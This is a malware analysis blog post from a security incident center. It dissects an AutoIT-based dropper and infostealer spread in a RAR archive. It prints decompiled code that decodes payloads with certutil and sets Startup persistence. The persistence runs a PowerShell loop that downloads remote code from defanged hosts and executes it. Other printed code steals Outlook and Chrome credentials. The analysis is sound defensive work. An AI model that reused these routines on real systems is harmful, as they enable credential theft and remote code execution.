AutoIT Remains Popular in the Malware Landscape

Published: 2023-01-06. Last Updated: 2023-01-06 07:06:18 UTC
by Xavier Mertens (Version: 1)
1 comment(s)

Yesterday Brad wrote an interesting diary[1] about a piece o malware based on AutoIT. Funny, I was also analyzing a sample that has been written in the same language. I don’t know exactly the source (it was spotted via a hunting ruile) but it seems to target the same people (based on the file name). Mine was delivered in a RAR archive called “doc-Impostos_514281.rar” (SHA256:84a35910ad7acb1455695be7aced111356fac9abc818f9ae0859677b07ac0d04). The VT score is very low: 1/61[2].

The archive contains a Windows batch file:

remnux@remnux:/MalwareZoo/20230105$ rar t doc-Imposto_514281.rar
RAR 5.50   Copyright (c) 1993-2017 Alexander Roshal   11 Aug 2017
Trial version             Type 'rar -?' for help

Testing archive doc-Imposto_514281.rar

Testing     doc-Impostos.cmd                                          OK
All OK

The .cmd file (SHA256:f6e84e43323ed9d8531fa2aeeb3c181c8f84fcbe950ce6dcdd8c3fa0b02c6cc0). Here again, the same VT score[3]. It is quite large for this type of file (1.4MB) and when you check it, it looks suspicious:

remnux@remnux:/mnt/hgfs/MalwareZoo/20230105$ head doc-Impostos.cmd

if not DEFINED sexton set sexton=1 && start "" /min "%~dpnx0" %* && exit
goto g
-----BEGIN CERTIFICATE-----
o0hLvphsSqmZTFMKhtZIfUFVMyFFQTA2Taj/cySnPPZ6EvFnrMGT52tDylKmrQAA
4bs6IaUp4+znC5guQL3hmt6ARrGdazsh1LHWdTrIPcbQM/cUr8sXopQBjROI/mSV
Yee2TRv4AABrOlzazS6YAkunKeO9Ocao3hrw/HClY1NYGAr7zQEV+ujrd0/5T4Eb
LQkHenqNqmVECaFi2fNA7MREm5Y300h/rP+Dp9eDW7LEl9tm6Wo9JsM/GecjC6hN
4GGLI3yLeSYHKm3CVyjE5Hf7c+2krxa5qaqV6HmkALyHAAC8hwAAhKYAAFwb2QFN
58IRXBvZAU3nwhFrQ8pSr60AAOb7JXjI4hP5fR3t3XEAsFUtrJrVKBXU8M8l5M8R
jlbCzj9w77loH/gAANjQmDyxWa/YFeZ3XooB+qbTr+kRo45T/dFF7Jl0WDCjlCuG

When execute, the script jumps directly to a label “g”. Let’s search it and we found the interesting code below in the file:

:g
cd /D %~dp0
set hammond=%appdata%\green\
set vasquez=%~n0
set sharpe=vcolon
set maddox=
if not exist "%hammond%exe\%sharpe%\thomas%maddox%.exe" (
  mkdir "%hammond%exe\%sharpe%\"
  more +5 %0 >~~
  powershell -Command "(gc ~~) -replace '>', '' | Out-File -encoding ASCII ~~"
  certutil -decode -f ~~ "%hammond%exe\%sharpe%\thomas%maddox%.exe"
  del ~~
)
set hash=stanley
call :ts %0 "%hammond%a3x\%hash%\%vasquez%.a3x"
if %t1% geq %t2% (
mkdir "%hammond%a3x\%hash%\"
certutil -decode -f %0 "%hammond%a3x\%hash%\%vasquez%.a3x"

This piece of code does the magic and extract the chunk of Base64 data from the script using certutil.exe.

The batch file contains 2 chunks of data that once extracted are:

  • thomas.exe (SHA256:237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
  • doc-Impostos.a3x (SHA256:d07d4d7a6314c51ff078c2f952d17afa7af1d6f638d47d6d793e102538a2dbf9)

The PE file is just a standalone AutoIT interpreter that will receive the second file as argument. ".a3x" is the extension used by files compiled with AutoIT v3. The AutoIt file is executed thtough wmic:

wmic process call create '"%hammond%exe\%sharpe%\thomas%maddox%.exe" "%hammond%a3x\%hash%\%vasquez%.a3x" "%*"' ,%wdir%

Let’s have a look at the AutoIT script. There exists tools to perform this task. The most popular is myAutToExe.exe[4] (be careful, this tool is a bit shady and can be found from multiple locations that are not always safe!)

But, why AutoIT remains popular for malware? This language has been developed, like the name says, to automate actions in a Windows environment. This means that you can select windows, move the mouse, click on buttons, … But AutoIt can also work at a lower level and, interesting in the context of malware, use any Windows API via the DllCall() function.

Here is an example found in the decompile script:

FUNC _WINAPI_WRITEPROCESSMEMORY($HPROCESS, $PBASEADDRESS, $PBUFFER, $ISIZE, BYREF $IWRITTEN, $SBUFFER = "ptr")
  LOCAL $ARESULT = DLLCALL("kernel32.dll", "bool", "WriteProcessMemory", "handle", $HPROCESS, "ptr", $PBASEADDRESS, \
    $SBUFFER, $PBUFFER, "ulong_ptr", $ISIZE, "ulong_ptr*", 0)
  IF @ERROR THEN RETURN SETERROR(@ERROR, @EXTENDED, FALSE)
  $IWRITTEN = $ARESULT[5]
  RETURN $ARESULT[0]
ENDFUNC

WriteProcessMemory is very useful to perform process injection!

What are the main capabilities of this malware?

First, it downloads and executes a VBS payload (some information about the victim are exfiltrated):

GLOBAL $URL_TARGET = "hxxps://publicpressmagazine[.]com/images/swan/do/it.php"
IF _ISWIN7() THEN $URL_TARGET = "http://publicpressmagazine.com/images/swan/do/it.php"
LOCAL $ISADMIN = "User"
IF ISADMIN() THEN $ISADMIN = "Admin"
$URLBIN = $URL_TARGET & "?b1=1&v1=" & DEC(@OSLANG) & "&v2=" & DEC(@KBLAYOUT) & "&v3=" & _GETOS() & "&v4=" & $ISADMIN & "&v5=" & @OSARCH
$SPATHBIN = @TEMPDIR & "\nh38fj2745td.txt"
IF $URLBIN <> "" THEN
  INETGET($URLBIN, $SPATHBIN, $INET_FORCEBYPASS)
  IF NOT FILEEXISTS($SPATHBIN) THEN
    _DOWNLOADFILE($URLBIN, $SPATHBIN)
  ENDIF
  FILEMOVE($SPATHBIN, $SPATHBIN & ".vbs")
  SHELLEXECUTE($SPATHBIN & ".vbs")
ENDIF

(Note: The website has been cleaned and the payload was not available anymore)

It implements persistence via \Programs\Startup:

FUNC CREATESHORTCUTX()
  LOCAL $SSERIAL = HEX(DRIVEGETSERIAL(@HOMEDRIVE & "\"))
  LOCAL $STRPS = '$links = ("hxxp://moscowkov[.]xyz/sys/?h=' & $SSERIAL & '", "hxxp://moscowkov[.]at/sys/?h=' & $SSERIAL & '");for(;;){foreach($link in $links){try{$req = [System.Net.WebRequest]::Create($link);$resp = $req.GetResponse();$reqstream = $resp.GetResponseStream();$stream = new-object System.IO.StreamReader $reqstream;$result = $stream.ReadToEnd();Write-Output $result;try{IEX $result;}catch{}Write-Output "60";Start-Sleep -Seconds 60;break;}catch{Write-Output "e";}}Start-Sleep -Seconds 10;}'
  LOCAL $ARRAYTOREPLACE = STRINGSPLIT("$links|$link|$req|$resp|$re1qstream|$str3am|$result", "|")
  FOR $I = 1 TO $ARRAYTOREPLACE[0]
    IF STRINGINSTR($STRPS, $ARRAYTOREPLACE[$I]) THEN
      $STRPS = STRINGREPLACE($STRPS, $ARRAYTOREPLACE[$I], "$" & GENERATE())
    ENDIF
  NEXT
  $STRPS = STRINGREPLACE(_BASE64ENCODE(STRINGTOBINARY($STRPS, $SB_UTF16LE)), @LF, "")
  LOCAL CONST $STARTUP2 = @STARTMENUDIR & "\Programs\Startup\DriverAudio.lnk"
  FILEDELETE($STARTUP2)
  FILECREATESHORTCUT("%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", $STARTUP2, "", "-WindowStyle hidden \
    -ExecutionPolicy UnRestricted -Encoded " & $STRPS)
  SHELLEXECUTE($STARTUP2)
ENDFUNC

It exfiltrates data from Outlook:

FUNC _GETINFORMATION()
  LOCAL $AREGISTRY[] = ["HKCU\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\",
    "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging 
     Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\", 
    "HKCU\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\", 
    "HKCU\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\"]
  LOCAL $SOUTPUT = ""
  FOR $I = 0 TO UBOUND($AREGISTRY) - 1
    IF _FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "Email") THEN
     IF _FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 Server") THEN
       $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 Server")) & ","
       $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 User")) & ","
       $SOUTPUT &= _UNPROTECT(BINARYMID(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 Password"), 2)) & @CRLF
       $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "SMTP Server")) & ","
       $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 User")) & ","
       $SOUTPUT &= _UNPROTECT(BINARYMID(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "POP3 Password"), 2)) & @CRLF
     ELSE
       $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP Server")) & ","
       $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP User")) & ","
       $SOUTPUT &= _UNPROTECT(BINARYMID(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP Password"), 2)) & @CRLF
       $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "SMTP Server")) & ","
       $SOUTPUT &= _BIN2STR(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP User")) & ","
       $SOUTPUT &= _UNPROTECT(BINARYMID(_FINDREGISTRYKEYVALUENAME($AREGISTRY[$I], "IMAP Password"), 2)) & @CRLF
     ENDIF
   ENDIF
   NEXT
   RETURN $SOUTPUT
ENDFUNC

It extracts passwords from Chrome:

FUNC _GETCHROMEPASSWORD()
  LOCAL $ACHROMEPASSWORD[1000][3]
  LOCAL $SBINCHROMEMASTERKEY = _GETMASTERKEY()
  LOCAL $HQUERY, $AROW
  LOCAL $SLOGINDATA = @LOCALAPPDATADIR & "\Google\Chrome\User Data\Default\Login Data"
  _LOG("Login DataPath: " & $SLOGINDATA)
  LOCAL $STEMPFILENAME = _TEMPFILE(@TEMPDIR, "", ".tmp", DEFAULT)
  FILECOPY($SLOGINDATA, $STEMPFILENAME, 1)
  IF NOT FILEEXISTS($STEMPFILENAME) THEN RETURN ""
  _LOG("OK")
  $SQLLIBRARY = @TEMPDIR & "\sqlite3.dll"
  IF NOT FILEEXISTS($SQLLIBRARY) THEN
    _DOWNLOADFILE("hxxps://www[.]autoitscript[.]com/autoit3/pkgmgr/sqlite/sqlite3.dll", $SQLLIBRARY)
  ENDIF
  IF NOT FILEEXISTS($SQLLIBRARY) THEN
    RETURN ""
  ENDIF
  _SQLITE_STARTUP($SQLLIBRARY, FALSE, TRUE)
  _SQLITE_OPEN($STEMPFILENAME)
  IF @ERROR THEN
    RETURN ""
  ENDIF
  _SQLITE_QUERY(-1, "SELECT * FROM logins;", $HQUERY)
  LOCAL $SURL = ""
  LOCAL $SUSERNAME = ""
  LOCAL $SPASSWORD = ""
  LOCAL $SBUFF = ""
  LOCAL $ICOUNT = 0
  WHILE _SQLITE_FETCHDATA($HQUERY, $AROW, FALSE, FALSE) = $SQLITE_OK
    $SURL = $AROW[0]
    $SUSERNAME = $AROW[3]
    $SPASSWORD = $AROW[5]
    IF NOT $SUSERNAME OR NOT $SPASSWORD THEN CONTINUELOOP
    _LOG(">" & $SURL)
    _LOG($SUSERNAME)
    _LOG($SPASSWORD)
    $ACHROMEPASSWORD[$ICOUNT][0] = $SURL
    $ACHROMEPASSWORD[$ICOUNT][1] = $SUSERNAME
    $ACHROMEPASSWORD[$ICOUNT][2] = $SPASSWORD
    IF BINARYTOSTRING(BINARYMID($SPASSWORD, 1, 3)) = "v10" THEN 
      $ACHROMEPASSWORD[$ICOUNT][2] = STRINGSTRIPWS(_CHROMEDECRYPTAES($SPASSWORD, $SBINCHROMEMASTERKEY), 2)
      $SBUFF = $SBUFF & $SURL & "|" & $SUSERNAME & "|" & $ACHROMEPASSWORD[$ICOUNT][2] & @CRLF
    ELSE
      $ACHROMEPASSWORD[$ICOUNT][2] = STRINGSTRIPWS(BINARYTOSTRING(_CHROMEDECRYPTOLD($SPASSWORD), 4), 2)
      $SBUFF = $SBUFF & $SURL & "|" & $SUSERNAME & "|" & $ACHROMEPASSWORD[$ICOUNT][2] & @CRLF
   ENDIF
    $ICOUNT += 1
  WEND
  REDIM $ACHROMEPASSWORD[$ICOUNT][3]
  _SQLITE_CLOSE()
  _SQLITE_SHUTDOWN()
  FILEDELETE($STEMPFILENAME)
  RETURN $SBUFF ? $SBUFF : ""
ENDFUNC

Extracted information is exfiltrated using HTTP POST requests. 

[1] https://isc.sans.edu/diary/More%20Brazil%20malspam%20pushing%20Astaroth%20%28Guildma%29%20in%20January%202023/29404
[2] https://www.virustotal.com/gui/file/84a35910ad7acb1455695be7aced111356fac9abc818f9ae0859677b07ac0d04
[3] https://www.virustotal.com/gui/file/f6e84e43323ed9d8531fa2aeeb3c181c8f84fcbe950ce6dcdd8c3fa0b02c6cc0
[4] https://github.com/PonyPC/myaut_contrib/blob/master/readme.txt

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keywords: AutoIT Malware
1 comment(s)
ISC Stormcast For Friday, January 6th, 2023 https://isc.sans.edu/podcastdetail.html?id=8314

Comments


Diary Archives